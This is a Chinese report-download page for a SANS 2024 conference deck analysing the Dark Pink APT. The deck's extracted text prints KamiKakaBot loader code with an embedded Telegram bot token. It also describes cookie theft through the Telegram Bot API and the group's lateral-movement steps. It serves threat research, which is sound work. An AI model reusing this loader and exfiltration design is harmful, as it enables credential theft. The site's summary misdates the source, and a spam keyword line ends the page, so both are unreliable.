當前位置：首頁 > 報告詳情

揭開Dark Pink的面紗——對APAC隱蔽的APT威脅的深入分析.pdf

上傳人：蘆葦編號：185956 2024-11-02 PDF PDF 27頁 1.99MB

該報告所屬合集： 2024年SANS網絡威脅會議（Cyber Threat Summit 2024）嘉賓演講PPT合集

打包下載報告合集

文檔加載中……請稍候！
如果長時間未打開，您也可以點擊刷新試試。

下載報告到電腦，查找使用更方便

VIP專享文檔

書簽

分享

收藏

已收藏

版權投訴

/27

立即下載

word格式文檔無特別注明外均可編輯修改，預覽文件經過壓縮，下載原文更清晰！

三個皮匠報告文庫所有資源均是客戶上傳分享，僅供網友學習交流，未經上傳用戶書面授權，請勿作商用。

《揭開Dark Pink的面紗——對APAC隱蔽的APT威脅的深入分析.pdf》由會員分享，可在線閱讀，更多相關《揭開Dark Pink的面紗——對APAC隱蔽的APT威脅的深入分析.pdf（27頁珍藏版）》請在三個皮匠報告上搜索。

1、Unveiling Dark Pink:An In-Depth Analysis of APACs Covert APT ThreatOUTLINEDark Pinks latest campaignTelegram Exfiltration and C2 demoTeleScoutDark Pinks TTPsI GOT AN EMAIL!(Group-IB,2023)ISO FILEISO FILESigned winword.exe sideloads wwlib.dllMalicious wwlib.dll sets up persistenceExtracts XOR encrypt

2、ed payload from.doc lureDisplays.doc lureSets up scheduled taskSCHEDULED TASKMicrosoft Build Task saved in Temp folderName wct*.tmp relates to normal OneDrive activity public static void main()string stealer_module=init_br();string Telegram_Chat_ID=Encoding.Default.GetString(chat_id_numbers);var inp

3、utStream=new MemoryStream(main_payload);ZipArchive archive=new ZipArchive(inputStream,ZipArchiveMode.Read);ZipArchiveEntry archEntry=archive.Entries0;Stream entryStream=archEntry.Open()var tmpMem=new MemoryStream();entryStream.CopyTo(tmpMem);var xtmp=tmpMem.ToArray();var memory_payload=Assembly.Load

4、(xtmp);byte Telegram_BOT_API_token=Convert.FromBase64String(0vHS+db60vvU+t6IpY+WpaKzh4WRsLyc0IGcgo26opyMv4y+r7yHsKj9lo23+Q=);foreach(Type type in memory_payload.GetExportedTypes()try var c=Activator.CreateInstance(type);type.InvokeMember(KaidnfAei,BindingFlags.InvokeMethod,null,c,new object Telegram

5、_BOT_API_token,Telegram_Chat_ID,stealer_module);catch continue;BUILD TASK6860236203:AAFrlFzcLuyXU4HxKisFUhvhwKucyL4rDS0TELEGRAM BOT APIUsed to communicate with bots in Telegram chatsHTTP-based interfaceFormat:https:/api.telegram.org/bot$token/$method?$paramsImportant methods:sendMessage?chat_id=&tex

6、t=:sends message to specified chatsendDocument?chat_id=&caption=:sends document to specified chatgetUpdates:Retrieves latest messages seen by the bot in Telegram chatsKAMIKAKABOT.NET executableSeparate.NET stealer moduleExecutes cmd.exe through/getUpdatesSends result back using/sendMessageExfiltrate

7、s Edge,Firefox,and Chrome cookies using/sendDocumentImplements commands to update Telegram Bot Token,XML payloadKAMIKAKABOT DEMOTELESCOUTTool to extract Telegram messages seen by bots using Bot TokenAutomatically downloads images,videos,audioReconstructs individual chats and creates easily viewable

8、HTML filesDisplays sender,time and dateTELESCOUT DEMOSTOLEN CREDSPERSISTENCEPERSISTENCE 2DEFENSE EVASIONDISCOVERYLAT MOVEMENT1.SMB shares1.Enumerating SMB shares2.Copying KamiKakaBot loader to recently used folders on shares and hiding it3.Creating shortcuts mimicking actual recently used folders4.H

9、iding actual folders5.Shortcuts open folder and executes loader2.USB drives1.Registering WMI event for USB plug-in2.Copying KamiKakaBot loader to USB drive and hiding it3.INGRESS TOOLSTelePowerBotEXFILTRATIONCommon extensionsRecent FilesCompressed and exfiltrated using Telegram BotDARK PINKFirst des

10、cribed by Group-IB in January 2023Active since mid-2021Latest activity February 2024Targeting government,defense,NGOsSouth-East Asia:Malaysia,Indonesia,Brunei,Cambodia,Vietnam,Philippines,Europe:Belgium,BosniaNo conclusive evidence for attributionLANGUAGE CODES/getUpdates reveals details on recently sent messagesETCThank You CYBERTHREAT!AcknowledgementsAlbert Priego BravoGroup-IB

相關圖表

本文是Group-IB在2023年發布的一份研究報告，主要分析了APAC地區一種名為Dark Pink的秘密APT威脅。報告概述了Dark Pink的最新活動，包括使用Telegram進行數據泄露的演示，以及其戰術、技術和程序（TTPs）。研究指出，Dark Pink自2021年中以來一直活躍，目標主要是政府、國防和NGO組織，在東南亞和歐洲都有活動案例。關鍵數據包括：Dark Pink在2024年2月的最新活動，以及其對馬來西亞、印度尼西亞、文萊、柬埔寨、越南、菲律賓等國家以及比利時、波斯尼亞等歐洲國家的目標選擇。研究還提到，沒有確鑿的證據來確定其歸屬。 Dark Pink使用了一種名為Kamikakabot.net的.NET模塊化竊密工具，通過Telegram Bot API與機器人聊天進行通信，并使用/getUpdates命令獲取更新，然后通過/sendMessage和/sendDocument命令發送消息和文件。此外，他們還使用/sendDocument命令竊取Edge、Firefox和Chrome的cookie。該組織還采取了一系列防御規避措施，如 enumerating SMB shares、creating shortcuts mimicking actual recently used folders等。

您能詳細解釋一下Dark Pink APT威脅的特點和活動嗎？請問Telegram在Dark Pink APT威脅中是如何被用于數據泄露的？能否介紹一下KamiKakaBot惡意軟件的功能和它如何逃避防御系統？

相關報告

聯系我們

0731-84720580
sgpjbg002
工作日 9:30 - 18:00

關于我們

侵權處理

關于我們

出版物經營許可證
工信部備案號：湘ICP備17000430號-2
公安備案號：湘公網安備43010402001071號

三個皮匠報告專業的行業報告下載站，每日更新，歡迎大家關注！

copyright@2008-2013 長沙景略智創信息技術有限公司版權所有
網站備案/許可證號：湘B2-20190120

客服

小程序

服務號

折疊

午夜网日韩中文字幕,日韩Av中文字幕久久,亚洲中文字幕在线一区二区,最新中文字幕在线视频网站